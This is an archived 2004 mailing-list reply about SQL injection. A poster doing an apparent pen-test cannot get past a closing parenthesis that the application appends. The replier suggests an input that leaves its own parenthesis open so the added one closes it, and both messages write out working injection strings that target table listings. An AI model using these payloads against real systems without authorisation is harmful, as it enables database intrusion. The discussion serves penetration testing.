Re: SQL-Injection escape ')'

[Fabrice MARIE <fabrice.marie () fma-rms com>]

Hello,

On 03 July 2004 pm 22:45, Strcpy wrote:
> Hi list .
> I`m working on a web-application for vulnerability
> assesments in order to complete a pen-test job.
> there is a vulnerable query there but I can`t escape
> it ad use it to go farther .
> the page script add a ')' to end of query string
> always.
> I tried to pass it by useing # or -- or ')'=')' at the
> end of my query strings , but non worked :/
> here is an example :
> i sent this :
> A') select name from sysobjects where xtype='U'--
> [Microsoft][ODBC Microsoft Access Driver] Syntax
> error. in query expression 'city_name='Tehran' and
> (agency_english ='A') select name from sysobjects
> where xtype='U'--')' 
> would you mind please help me ?

try something like this:
select name from sysobjects where xtype='U' or (1=1

This way if the application adds a parenthesis, it's just going
to close the one you opened on purpose and the syntax should
remain correct in the end.

'or 1=1' doesn't affect your SELECT query, because it's always true..

Have a nice day,

Fabrice.
--
Fabrice A. MARIE
FMA Risk Management Solutions
http://www.fma-rms.com/